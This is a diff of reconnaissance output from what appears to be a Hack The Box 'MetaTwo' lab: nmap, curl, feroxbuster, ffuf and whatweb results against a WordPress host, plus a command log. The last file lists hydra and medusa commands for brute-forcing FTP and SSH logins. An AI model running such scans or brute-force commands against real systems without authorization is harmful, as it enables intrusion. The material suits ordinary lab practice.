+Read data files from: /usr/bin/../share/nmap
+Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+# Nmap done at Wed Jan 25 11:18:39 2023 -- 1 IP address (1 host up) scanned in 559.05 seconds
+
+```
--- a/HTB/metatwo/results/report/report.md/10.10.11.186/Services/Service
+++ b/HTB/metatwo/results/report/report.md/10.10.11.186/Services/Service
@@ -0,0 +1,31 @@
+```bash
+nmap -vv --reason -Pn -T4 -sV -p 21 --script="banner,(ftp* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/kali/htb/metatwo/results/scans/tcp21/tcp_21_ftp_nmap.txt" -oX "/home/kali/htb/metatwo/results/scans/tcp21/xml/tcp_21_ftp_nmap.xml" 10.10.11.186
+```
+
+[/home/kali/htb/metatwo/results/scans/tcp21/tcp_21_ftp_nmap.txt](file:///home/kali/htb/metatwo/results/scans/tcp21/tcp_21_ftp_nmap.txt):
+
+```
+# Nmap 7.93 scan initiated Wed Jan 25 11:18:39 2023 as: nmap -vv --reason -Pn -T4 -sV -p 21 "--script=banner,(ftp* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN /home/kali/htb/metatwo/results/scans/tcp21/tcp_21_ftp_nmap.txt -oX /home/kali/htb/metatwo/results/scans/tcp21/xml/tcp_21_ftp_nmap.xml 10.10.11.186
+Nmap scan report for metatwo.htb (10.10.11.186)
+Host is up, received user-set (0.037s latency).
+Scanned at 2023-01-25 11:18:40 EST for 333s
+
+PORT   STATE SERVICE REASON  VERSION
+21/tcp open  ftp?    syn-ack
+| fingerprint-strings: 
+|   GenericLines: 
+|     220 ProFTPD Server (Debian) [::ffff:10.10.11.186]
+|     Invalid command: try being more creative
+|_    Invalid command: try being more creative
+1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
+SF-Port21-TCP:V=7.93%I=7%D=1/25%Time=63D1566B%P=x86_64-pc-linux-gnu%r(Gene
+SF:ricLines,8F,"220\x20ProFTPD\x20Server\x20\(Debian\)\x20\[::ffff:10\.10\
+SF:.11\.186\]\r\n500\x20Invalid\x20command:\x20try\x20being\x20more\x20cre
+SF:ative\r\n500\x20Invalid\x20command:\x20try\x20being\x20more\x20creative
+SF:\r\n");
+
+Read data files from: /usr/bin/../share/nmap
+Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+# Nmap done at Wed Jan 25 11:24:13 2023 -- 1 IP address (1 host up) scanned in 333.35 seconds
+
+```
--- a/HTB/metatwo/results/report/report.md/10.10.11.186/Services/Service
+++ b/HTB/metatwo/results/report/report.md/10.10.11.186/Services/Service
@@ -0,0 +1,71 @@
+```bash
+nmap -vv --reason -Pn -T4 -sV -p 22 --script="banner,ssh2-enum-algos,ssh-hostkey,ssh-auth-methods" -oN "/home/kali/htb/metatwo/results/scans/tcp22/tcp_22_ssh_nmap.txt" -oX "/home/kali/htb/metatwo/results/scans/tcp22/xml/tcp_22_ssh_nmap.xml" 10.10.11.186
+```
+
+[/home/kali/htb/metatwo/results/scans/tcp22/tcp_22_ssh_nmap.txt](file:///home/kali/htb/metatwo/results/scans/tcp22/tcp_22_ssh_nmap.txt):
+
+```
+# Nmap 7.93 scan initiated Wed Jan 25 11:18:39 2023 as: nmap -vv --reason -Pn -T4 -sV -p 22 --script=banner,ssh2-enum-algos,ssh-hostkey,ssh-auth-methods -oN /home/kali/htb/metatwo/results/scans/tcp22/tcp_22_ssh_nmap.txt -oX /home/kali/htb/metatwo/results/scans/tcp22/xml/tcp_22_ssh_nmap.xml 10.10.11.186
+Nmap scan report for metatwo.htb (10.10.11.186)
+Host is up, received user-set (0.023s latency).
+Scanned at 2023-01-25 11:18:40 EST for 1s
+
+PORT   STATE SERVICE REASON  VERSION
+22/tcp open  ssh     syn-ack OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
+| ssh-hostkey: 
+|   3072 c4b44617d2102d8fec1dc927fecd79ee (RSA)
+| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDPp9LmBKMOuXu2ZOpw8JorL5ah0sU0kIBXvJB8LX26rpbOhw+1MPdhx6ptZzXwQ8wkQc88xu5h+oB8NGkeHLYhvRqtZmvkTpOsyJiMm+0Udbg+IJCENPiKGSC5J+0tt4QPj92xtTe/f7WV4hbBLDQust46D1xVJVOCNfaloIC40BtWoMWIoEFWnk7U3kwXcM5336LuUnhm69XApDB4y/dt5CgXFoWlDQi45WLLQGbanCNAlT9XwyPnpIyqQdF7mRJ5yRXUOXGeGmoO9+JALVQIEJ/7Ljxts6QuV633wFefpxnmvTu7XX9W8vxUcmInIEIQCmunR5YH4ZgWRclT+6rzwRQw1DH1z/ZYui5Bjn82neoJunhweTJXQcotBp8glpvq3X/rQgZASSyYrOJghBlNVZDqPzp4vBC78gn6TyZyuJXhDxw+lHxF82IMT2fatp240InLVvoWrTWlXlEyPiHraKC0okOVtul6T0VRxsuT+QsyU7pdNFkn2wDVvC25AW8=
+|   256 2aea2fcb23e8c529409cab866dcd4411 (ECDSA)
+| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBB1ZmNogWBUF8MwkNsezebQ+0/yPq7RX3/j9s4Qh8jbGlmvAcN0Z/aIBrzbEuTRf3/cHehtaNf9qrF2ehQAeM94=
+|   256 fd78c0b0e22016fa050debd83f12a4ab (ED25519)
+|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOP4kxBr9kumAjfplon8fXJpuqhdMJy2rpd3FM7+mGw2
+|_banner: SSH-2.0-OpenSSH_8.4p1 Debian-5+deb11u1
+| ssh2-enum-algos: 
+|   kex_algorithms: (9)
+|       curve25519-sha256
+|       curve25519-sha256@libssh.org
+|       ecdh-sha2-nistp256
+|       ecdh-sha2-nistp384
+|       ecdh-sha2-nistp521
+|       diffie-hellman-group-exchange-sha256
+|       diffie-hellman-group16-sha512
+|       diffie-hellman-group18-sha512
+|       diffie-hellman-group14-sha256
+|   server_host_key_algorithms: (5)
+|       rsa-sha2-512
+|       rsa-sha2-256
+|       ssh-rsa
+|       ecdsa-sha2-nistp256
+|       ssh-ed25519
+|   encryption_algorithms: (6)
+|       chacha20-poly1305@openssh.com
+|       aes128-ctr
+|       aes192-ctr
+|       aes256-ctr
+|       aes128-gcm@openssh.com
+|       aes256-gcm@openssh.com
+|   mac_algorithms: (10)
+|       umac-64-etm@openssh.com
+|       umac-128-etm@openssh.com
+|       hmac-sha2-256-etm@openssh.com
+|       hmac-sha2-512-etm@openssh.com
+|       hmac-sha1-etm@openssh.com
+|       umac-64@openssh.com
+|       umac-128@openssh.com
+|       hmac-sha2-256
+|       hmac-sha2-512
+|       hmac-sha1
+|   compression_algorithms: (2)
+|       none
+|_      zlib@openssh.com
+| ssh-auth-methods: 
+|   Supported authentication methods: 
+|     publickey
+|_    password
+Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+Read data files from: /usr/bin/../share/nmap
+Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+# Nmap done at Wed Jan 25 11:18:41 2023 -- 1 IP address (1 host up) scanned in 1.82 seconds
+
+```
--- a/HTB/metatwo/results/report/report.md/10.10.11.186/Services/Service
+++ b/HTB/metatwo/results/report/report.md/10.10.11.186/Services/Service
@@ -0,0 +1,24 @@
+```bash
+curl -sSikf http://10.10.11.186:80/robots.txt
+```
+
+[/home/kali/htb/metatwo/results/scans/tcp80/tcp_80_http_curl-robots.txt](file:///home/kali/htb/metatwo/results/scans/tcp80/tcp_80_http_curl-robots.txt):
+
+```
+HTTP/1.1 302 Moved Temporarily
+Server: nginx/1.18.0
+Date: Wed, 25 Jan 2023 16:18:41 GMT
+Content-Type: text/html
+Content-Length: 145
+Connection: keep-alive
+Location: http://metapress.htb/
+
+<html>
+<head><title>302 Found</title></head>
+<body>
+<center><h1>302 Found</h1></center>
+<hr><center>nginx/1.18.0</center>
+</body>
+</html>
+
+```
--- a/HTB/metatwo/results/report/report.md/10.10.11.186/Services/Service
+++ b/HTB/metatwo/results/report/report.md/10.10.11.186/Services/Service
@@ -0,0 +1,25 @@
+```bash
+curl -sSik http://10.10.11.186:80/
+```
+
+[/home/kali/htb/metatwo/results/scans/tcp80/tcp_80_http_curl.html](file:///home/kali/htb/metatwo/results/scans/tcp80/tcp_80_http_curl.html):
+
+```
+HTTP/1.1 302 Moved Temporarily
+Server: nginx/1.18.0
+Date: Wed, 25 Jan 2023 16:18:41 GMT
+Content-Type: text/html
+Content-Length: 145
+Connection: keep-alive
+Location: http://metapress.htb/
+
+<html>
+<head><title>302 Found</title></head>
+<body>
+<center><h1>302 Found</h1></center>
+<hr><center>nginx/1.18.0</center>
+</body>
+</html>
+
+
+```
--- a/HTB/metatwo/results/report/report.md/10.10.11.186/Services/Service
+++ b/HTB/metatwo/results/report/report.md/10.10.11.186/Services/Service
@@ -0,0 +1,13 @@
+```bash
+feroxbuster -u http://10.10.11.186:80/ -t 50 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "txt,html,php,asp,aspx,jsp" -v -k -q -e -o "/home/kali/htb/metatwo/results/scans/tcp80/tcp_80_http_feroxbuster_directory-list-2.3-medium.txt"
+```
+
+[/home/kali/htb/metatwo/results/scans/tcp80/tcp_80_http_feroxbuster_directory-list-2.3-medium.txt](file:///home/kali/htb/metatwo/results/scans/tcp80/tcp_80_http_feroxbuster_directory-list-2.3-medium.txt):
+
+```
+WLD      GET        7l        9w      145c Got 302 for http://10.10.11.186/e578455e6e054d249578bf7e6c0cd509 (url length: 32)
+WLD         -         -         - http://10.10.11.186/e578455e6e054d249578bf7e6c0cd509 => http://metapress.htb/
+WLD      GET        7l        9w      145c Got 302 for http://10.10.11.186/fd84f08f2434479395436880d4806dcb22b8a6a25bd84c0ab30854d5a635138e9e033de8f46a4034a7119bf91a8e07fb (url length: 96)
+WLD         -         -         - http://10.10.11.186/fd84f08f2434479395436880d4806dcb22b8a6a25bd84c0ab30854d5a635138e9e033de8f46a4034a7119bf91a8e07fb => http://metapress.htb/
+
+```
--- a/HTB/metatwo/results/report/report.md/10.10.11.186/Services/Service
+++ b/HTB/metatwo/results/report/report.md/10.10.11.186/Services/Service
@@ -0,0 +1,24 @@
+```bash
+curl -sSikf http://10.10.11.186:80/.well-known/security.txt
+```
+
+[/home/kali/htb/metatwo/results/scans/tcp80/tcp_80_http_known-security.txt](file:///home/kali/htb/metatwo/results/scans/tcp80/tcp_80_http_known-security.txt):
+
+```
+HTTP/1.1 302 Moved Temporarily
+Server: nginx/1.18.0
+Date: Wed, 25 Jan 2023 16:18:41 GMT
+Content-Type: text/html
+Content-Length: 145
+Connection: keep-alive
+Location: http://metapress.htb/
+
+<html>
+<head><title>302 Found</title></head>
+<body>
+<center><h1>302 Found</h1></center>
+<hr><center>nginx/1.18.0</center>
+</body>
+</html>
+
+```
--- a/HTB/metatwo/results/report/report.md/10.10.11.186/Services/Service
+++ b/HTB/metatwo/results/report/report.md/10.10.11.186/Services/Service
@@ -0,0 +1,88 @@
+```bash
+nmap -vv --reason -Pn -T4 -sV -p 80 --script="banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)" -oN "/home/kali/htb/metatwo/results/scans/tcp80/tcp_80_http_nmap.txt" -oX "/home/kali/htb/metatwo/results/scans/tcp80/xml/tcp_80_http_nmap.xml" 10.10.11.186
+```
+
+[/home/kali/htb/metatwo/results/scans/tcp80/tcp_80_http_nmap.txt](file:///home/kali/htb/metatwo/results/scans/tcp80/tcp_80_http_nmap.txt):
+
+```
+# Nmap 7.93 scan initiated Wed Jan 25 11:18:39 2023 as: nmap -vv --reason -Pn -T4 -sV -p 80 "--script=banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)" -oN /home/kali/htb/metatwo/results/scans/tcp80/tcp_80_http_nmap.txt -oX /home/kali/htb/metatwo/results/scans/tcp80/xml/tcp_80_http_nmap.xml 10.10.11.186
+Nmap scan report for metatwo.htb (10.10.11.186)
+Host is up, received user-set (0.028s latency).
+Scanned at 2023-01-25 11:18:40 EST for 81s
+
+PORT   STATE SERVICE REASON  VERSION
+80/tcp open  http    syn-ack nginx 1.18.0
+| http-vhosts: 
+|_128 names had status 302
+|_http-csrf: Couldn't find any CSRF vulnerabilities.
+| http-sitemap-generator: 
+|   Directory structure:
+|   Longest directory structure:
+|     Depth: 0
+|     Dir: /
+|   Total files found (by extension):
+|_    
+|_http-wordpress-enum: Nothing found amongst the top 100 resources,use --script-args search-limit=<number|all> for deeper analysis)
+|_http-devframework: Couldn't determine the underlying framework or CMS. Try increasing 'httpspider.maxpagecount' value to spider more pages.
+|_http-fetch: Please enter the complete path of the directory to save data in.
+|_http-drupal-enum: Nothing found amongst the top 100 resources,use --script-args number=<number|all> for deeper analysis)
+|_http-chrono: Request times for /; avg: 215.68ms; min: 203.92ms; max: 255.33ms
+|_http-server-header: nginx/1.18.0
+|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
+|_http-dombased-xss: Couldn't find any DOM based XSS.
+|_http-mobileversion-checker: No mobile version detected.
+| http-methods: 
+|_  Supported Methods: GET HEAD POST OPTIONS
+|_http-title: Did not follow redirect to http://metapress.htb/
+|_http-errors: Couldn't find any error pages.
+|_http-jsonp-detection: Couldn't find any JSONP endpoints.
+|_http-comments-displayer: Couldn't find any comments.
+|_http-feed: Couldn't find any feeds.
+| http-headers: 
+|   Server: nginx/1.18.0
+|   Date: Wed, 25 Jan 2023 16:18:51 GMT
+|   Content-Type: text/html
+|   Content-Length: 145
+|   Connection: close
+|   Location: http://metapress.htb/
+|   
+|_  (Request type: GET)
+|_http-config-backup: ERROR: Script execution failed (use -d to debug)
+|_http-referer-checker: Couldn't find any cross-domain scripts.
+|_http-date: Wed, 25 Jan 2023 16:18:48 GMT; +2s from local time.
+|_http-wordpress-users: [Error] Wordpress installation was not found. We couldn't find wp-login.php
+| http-useragent-tester: 
+|   Status for browser useragent: 200
+|   Redirected To: http://metapress.htb/
+|   Allowed User Agents: 
+|     Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
+|     libwww
+|     lwp-trivial
+|     libcurl-agent/1.0
+|     PHP/
+|     Python-urllib/2.5
+|     GT::WWW
+|     Snoopy
+|     MFC_Tear_Sample
+|     HTTP::Lite
+|     PHPCrawl
+|     URI::Fetch
+|     Zend_Http_Client
+|     http client
+|     PECL::HTTP
+|     Wget/1.13.4 (linux-gnu)
+|_    WWW-Mechanize/1.34
+| http-security-headers: 
+|   Cache_Control: 
+|     Header: Cache-Control: no-store, no-cache, must-revalidate
+|   Pragma: 
+|     Header: Pragma: no-cache
+|   Expires: 
+|_    Header: Expires: Thu, 19 Nov 1981 08:52:00 GMT
+|_http-litespeed-sourcecode-download: Request with null byte did not work. This web server might not be vulnerable
+
+Read data files from: /usr/bin/../share/nmap
+Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+# Nmap done at Wed Jan 25 11:20:01 2023 -- 1 IP address (1 host up) scanned in 81.17 seconds
+
+```
--- a/HTB/metatwo/results/report/report.md/10.10.11.186/Services/Service
+++ b/HTB/metatwo/results/report/report.md/10.10.11.186/Services/Service
@@ -0,0 +1,11 @@
+```bash
+curl -sk -o /dev/null -H "Host: yQBDdkqpvKEGuxwSOHam.metapress.htb" http://metapress.htb:80/ -w "%{size_download}"
+``````bash
+ffuf -u http://metapress.htb:80/ -t 10 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.metapress.htb" -fs 145 -noninteractive -s | tee "/home/kali/htb/metatwo/results/scans/tcp80/tcp_80_http_metapress.htb_vhosts_subdomains-top1million-110000.txt"
+```
+
+[/home/kali/htb/metatwo/results/scans/tcp80/tcp_80_http_metapress.htb_vhosts_subdomains-top1million-110000.txt](file:///home/kali/htb/metatwo/results/scans/tcp80/tcp_80_http_metapress.htb_vhosts_subdomains-top1million-110000.txt):
+
+```
+
+```
--- a/HTB/metatwo/results/report/report.md/10.10.11.186/Services/Service
+++ b/HTB/metatwo/results/report/report.md/10.10.11.186/Services/Service
@@ -0,0 +1,147 @@
+```bash
+whatweb --color=never --no-errors -a 3 -v http://10.10.11.186:80 2>&1
+```
+
+[/home/kali/htb/metatwo/results/scans/tcp80/tcp_80_http_whatweb.txt](file:///home/kali/htb/metatwo/results/scans/tcp80/tcp_80_http_whatweb.txt):
+
+```
+WhatWeb report for http://10.10.11.186:80
+Status    : 302 Found
+Title     : 302 Found
+IP        : 10.10.11.186
+Country   : RESERVED, ZZ
+
+Summary   : HTTPServer[nginx/1.18.0], nginx[1.18.0], RedirectLocation[http://metapress.htb/]
+
+Detected Plugins:
+[ HTTPServer ]
+	HTTP server header string. This plugin also attempts to
+	identify the operating system from the server header.
+
+	String       : nginx/1.18.0 (from server string)
+
+[ RedirectLocation ]
+	HTTP Server string location. used with http-status 301 and
+	302
+
+	String       : http://metapress.htb/ (from location)
+
+[ nginx ]
+	Nginx (Engine-X) is a free, open-source, high-performance
+	HTTP server and reverse proxy, as well as an IMAP/POP3
+	proxy server.
+
+	Version      : 1.18.0
+	Website     : http://nginx.net/
+
+HTTP Headers:
+	HTTP/1.1 302 Moved Temporarily
+	Server: nginx/1.18.0
+	Date: Wed, 25 Jan 2023 16:18:42 GMT
+	Content-Type: text/html
+	Content-Length: 145
+	Connection: close
+	Location: http://metapress.htb/
+
+WhatWeb report for http://metapress.htb/
+Status    : 200 OK
+Title     : MetaPress &#8211; Official company site
+IP        : 10.10.11.186
+Country   : RESERVED, ZZ
+
+Summary   : Cookies[PHPSESSID], HTML5, HTTPServer[nginx/1.18.0], MetaGenerator[WordPress 5.6.2], nginx[1.18.0], PHP[8.0.24], PoweredBy[--], Script, UncommonHeaders[link], WordPress[5.6.2], X-Powered-By[PHP/8.0.24]
+
+Detected Plugins:
+[ Cookies ]
+	Display the names of cookies in the HTTP headers. The
+	values are not returned to save on space.
+
+	String       : PHPSESSID
+
+[ HTML5 ]
+	HTML version 5, detected by the doctype declaration
+
+
+[ HTTPServer ]
+	HTTP server header string. This plugin also attempts to
+	identify the operating system from the server header.
+
+	String       : nginx/1.18.0 (from server string)
+
+[ MetaGenerator ]
+	This plugin identifies meta generator tags and extracts its
+	value.
+
+	String       : WordPress 5.6.2
+
+[ PHP ]
+	PHP is a widely-used general-purpose scripting language
+	that is especially suited for Web development and can be
+	embedded into HTML. This plugin identifies PHP errors,
+	modules and versions and extracts the local file path and
+	username if present.
+
+	Version      : 8.0.24
+	Google Dorks: (2)
+	Website     : http://www.php.net/
+
+[ PoweredBy ]
+	This plugin identifies instances of 'Powered by x' text and
+	attempts to extract the value for x.
+
+	String       : --
+
+[ Script ]
+	This plugin detects instances of script HTML elements and
+	returns the script language/type.
+
+
+[ UncommonHeaders ]
+	Uncommon HTTP server headers. The blacklist includes all
+	the standard headers and many non standard but common ones.
+	Interesting but fairly common headers should have their own
+	plugins, eg. x-powered-by, server and x-aspnet-version.
+	Info about headers can be found at www.http-stats.com
+
+	String       : link (from headers)
+
+[ WordPress ]
+	WordPress is an opensource blogging system commonly used as
+	a CMS.
+
+	Version      : 5.6.2
+	Aggressive function available (check plugin file or details).
+	Google Dorks: (1)
+	Website     : http://www.wordpress.org/
+
+[ X-Powered-By ]
+	X-Powered-By HTTP header
+
+	String       : PHP/8.0.24 (from x-powered-by string)
+
+[ nginx ]
+	Nginx (Engine-X) is a free, open-source, high-performance
+	HTTP server and reverse proxy, as well as an IMAP/POP3
+	proxy server.
+
+	Version      : 1.18.0
+	Website     : http://nginx.net/
+
+HTTP Headers:
+	HTTP/1.1 200 OK
+	Server: nginx/1.18.0
+	Date: Wed, 25 Jan 2023 16:18:42 GMT
+	Content-Type: text/html; charset=UTF-8
+	Transfer-Encoding: chunked
+	Connection: close
+	X-Powered-By: PHP/8.0.24
+	Set-Cookie: PHPSESSID=2ov58ptej4gtfom05meggtjkus; path=/
+	Expires: Thu, 19 Nov 1981 08:52:00 GMT
+	Cache-Control: no-store, no-cache, must-revalidate
+	Pragma: no-cache
+	Link: <http://metapress.htb/wp-json/>; rel="https://api.w.org/"
+	Content-Encoding: gzip
+
+
+
+```
--- a/HTB/metatwo/results/report/report.md/10.10.11.186/Services/Service
+++ b/HTB/metatwo/results/report/report.md/10.10.11.186/Services/Service
@@ -0,0 +1,3 @@
+```bash
+wkhtmltoimage --format png http://10.10.11.186:80/ /home/kali/htb/metatwo/results/scans/tcp80/tcp_80_http_screenshot.png
+```
--- a/HTB/metatwo/results/scans/_commands.log
+++ b/HTB/metatwo/results/scans/_commands.log
@@ -0,0 +1,30 @@
+nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN "/home/kali/htb/metatwo/results/scans/_quick_tcp_nmap.txt" -oX "/home/kali/htb/metatwo/results/scans/xml/_quick_tcp_nmap.xml" 10.10.11.186
+
+nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN "/home/kali/htb/metatwo/results/scans/_full_tcp_nmap.txt" -oX "/home/kali/htb/metatwo/results/scans/xml/_full_tcp_nmap.xml" 10.10.11.186
+
+nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN "/home/kali/htb/metatwo/results/scans/_quick_tcp_nmap.txt" -oX "/home/kali/htb/metatwo/results/scans/xml/_quick_tcp_nmap.xml" 10.10.11.186
+
+nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN "/home/kali/htb/metatwo/results/scans/_full_tcp_nmap.txt" -oX "/home/kali/htb/metatwo/results/scans/xml/_full_tcp_nmap.xml" 10.10.11.186
+
+nmap -vv --reason -Pn -T4 -sV -p 21 --script="banner,(ftp* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/kali/htb/metatwo/results/scans/tcp21/tcp_21_ftp_nmap.txt" -oX "/home/kali/htb/metatwo/results/scans/tcp21/xml/tcp_21_ftp_nmap.xml" 10.10.11.186
+
+nmap -vv --reason -Pn -T4 -sV -p 22 --script="banner,ssh2-enum-algos,ssh-hostkey,ssh-auth-methods" -oN "/home/kali/htb/metatwo/results/scans/tcp22/tcp_22_ssh_nmap.txt" -oX "/home/kali/htb/metatwo/results/scans/tcp22/xml/tcp_22_ssh_nmap.xml" 10.10.11.186
+
+feroxbuster -u http://10.10.11.186:80/ -t 50 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "txt,html,php,asp,aspx,jsp" -v -k -q -e -o "/home/kali/htb/metatwo/results/scans/tcp80/tcp_80_http_feroxbuster_directory-list-2.3-medium.txt"
+
+curl -sSikf http://10.10.11.186:80/.well-known/security.txt
+
+curl -sSikf http://10.10.11.186:80/robots.txt
+
+curl -sSik http://10.10.11.186:80/
+
+nmap -vv --reason -Pn -T4 -sV -p 80 --script="banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)" -oN "/home/kali/htb/metatwo/results/scans/tcp80/tcp_80_http_nmap.txt" -oX "/home/kali/htb/metatwo/results/scans/tcp80/xml/tcp_80_http_nmap.xml" 10.10.11.186
+
+curl -sk -o /dev/null -H "Host: yQBDdkqpvKEGuxwSOHam.metapress.htb" http://metapress.htb:80/ -w "%{size_download}"
+
+whatweb --color=never --no-errors -a 3 -v http://10.10.11.186:80 2>&1
+
+wkhtmltoimage --format png http://10.10.11.186:80/ /home/kali/htb/metatwo/results/scans/tcp80/tcp_80_http_screenshot.png
+
+ffuf -u http://metapress.htb:80/ -t 10 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.metapress.htb" -fs 145 -noninteractive -s | tee "/home/kali/htb/metatwo/results/scans/tcp80/tcp_80_http_metapress.htb_vhosts_subdomains-top1million-110000.txt"
+
--- a/HTB/metatwo/results/scans/_full_tcp_nmap.txt
+++ b/HTB/metatwo/results/scans/_full_tcp_nmap.txt
@@ -0,0 +1,39 @@
+# Nmap 7.93 scan initiated Wed Jan 25 11:09:20 2023 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN /home/kali/htb/metatwo/results/scans/_full_tcp_nmap.txt -oX /home/kali/htb/metatwo/results/scans/xml/_full_tcp_nmap.xml 10.10.11.186
+Nmap scan report for metatwo.htb (10.10.11.186)
+Host is up, received user-set (0.037s latency).
+Scanned at 2023-01-25 11:09:20 EST for 565s
+Not shown: 65532 closed tcp ports (conn-refused)
+PORT   STATE SERVICE REASON  VERSION
+21/tcp open  ftp     syn-ack
+| fingerprint-strings: 
+|   GenericLines: 
+|     220 ProFTPD Server (Debian) [::ffff:10.10.11.186]
+|     Invalid command: try being more creative
+|     Invalid command: try being more creative
+|   Verifier: 
+|_    220 ProFTPD Server (Debian) [::ffff:10.10.11.186]
+22/tcp open  ssh     syn-ack OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
+| ssh-hostkey: 
+|   3072 c4b44617d2102d8fec1dc927fecd79ee (RSA)
+| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDPp9LmBKMOuXu2ZOpw8JorL5ah0sU0kIBXvJB8LX26rpbOhw+1MPdhx6ptZzXwQ8wkQc88xu5h+oB8NGkeHLYhvRqtZmvkTpOsyJiMm+0Udbg+IJCENPiKGSC5J+0tt4QPj92xtTe/f7WV4hbBLDQust46D1xVJVOCNfaloIC40BtWoMWIoEFWnk7U3kwXcM5336LuUnhm69XApDB4y/dt5CgXFoWlDQi45WLLQGbanCNAlT9XwyPnpIyqQdF7mRJ5yRXUOXGeGmoO9+JALVQIEJ/7Ljxts6QuV633wFefpxnmvTu7XX9W8vxUcmInIEIQCmunR5YH4ZgWRclT+6rzwRQw1DH1z/ZYui5Bjn82neoJunhweTJXQcotBp8glpvq3X/rQgZASSyYrOJghBlNVZDqPzp4vBC78gn6TyZyuJXhDxw+lHxF82IMT2fatp240InLVvoWrTWlXlEyPiHraKC0okOVtul6T0VRxsuT+QsyU7pdNFkn2wDVvC25AW8=
+|   256 2aea2fcb23e8c529409cab866dcd4411 (ECDSA)
+| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBB1ZmNogWBUF8MwkNsezebQ+0/yPq7RX3/j9s4Qh8jbGlmvAcN0Z/aIBrzbEuTRf3/cHehtaNf9qrF2ehQAeM94=
+|   256 fd78c0b0e22016fa050debd83f12a4ab (ED25519)
+|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOP4kxBr9kumAjfplon8fXJpuqhdMJy2rpd3FM7+mGw2
+80/tcp open  http    syn-ack nginx 1.18.0
+|_http-title: Did not follow redirect to http://metapress.htb/
+| http-methods: 
+|_  Supported Methods: GET HEAD POST OPTIONS
+|_http-server-header: nginx/1.18.0
+1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
+SF-Port21-TCP:V=7.93%I=9%D=1/25%Time=63D15443%P=x86_64-pc-linux-gnu%r(Gene
+SF:ricLines,8F,"220\x20ProFTPD\x20Server\x20\(Debian\)\x20\[::ffff:10\.10\
+SF:.11\.186\]\r\n500\x20Invalid\x20command:\x20try\x20being\x20more\x20cre
+SF:ative\r\n500\x20Invalid\x20command:\x20try\x20being\x20more\x20creative
+SF:\r\n")%r(Verifier,33,"220\x20ProFTPD\x20Server\x20\(Debian\)\x20\[::fff
+SF:f:10\.10\.11\.186\]\r\n");
+Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+Read data files from: /usr/bin/../share/nmap
+Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+# Nmap done at Wed Jan 25 11:18:46 2023 -- 1 IP address (1 host up) scanned in 565.53 seconds
--- a/HTB/metatwo/results/scans/_manual_commands.txt
+++ b/HTB/metatwo/results/scans/_manual_commands.txt
@@ -0,0 +1,40 @@
+[*] ftp on tcp/21
+
+	[-] Bruteforce logins:
+
+		hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 21 -o "/home/kali/htb/metatwo/results/scans/tcp21/tcp_21_ftp_hydra.txt" ftp://10.10.11.186
+
+		medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 21 -O "/home/kali/htb/metatwo/results/scans/tcp21/tcp_21_ftp_medusa.txt" -M ftp -h 10.10.11.186
+
+[*] ssh on tcp/22
+
+	[-] Bruteforce logins:
+
+		hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 22 -o "/home/kali/htb/metatwo/results/scans/tcp22/tcp_22_ssh_hydra.txt" ssh://10.10.11.186
+
+		medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 22 -O "/home/kali/htb/metatwo/results/scans/tcp22/tcp_22_ssh_medusa.txt" -M ssh -h 10.10.11.186
+
+[*] http on tcp/80
+
+	[-] (feroxbuster) Multi-threaded recursive directory/file enumeration for web servers using various wordlists:
+
+		feroxbuster -u http://10.10.11.186:80 -t 50 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "txt,html,php,asp,aspx,jsp" -v -k -e -o /home/kali/htb/metatwo/results/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt
+
+	[-] Credential bruteforcing commands (don't run these without modifying them):
+
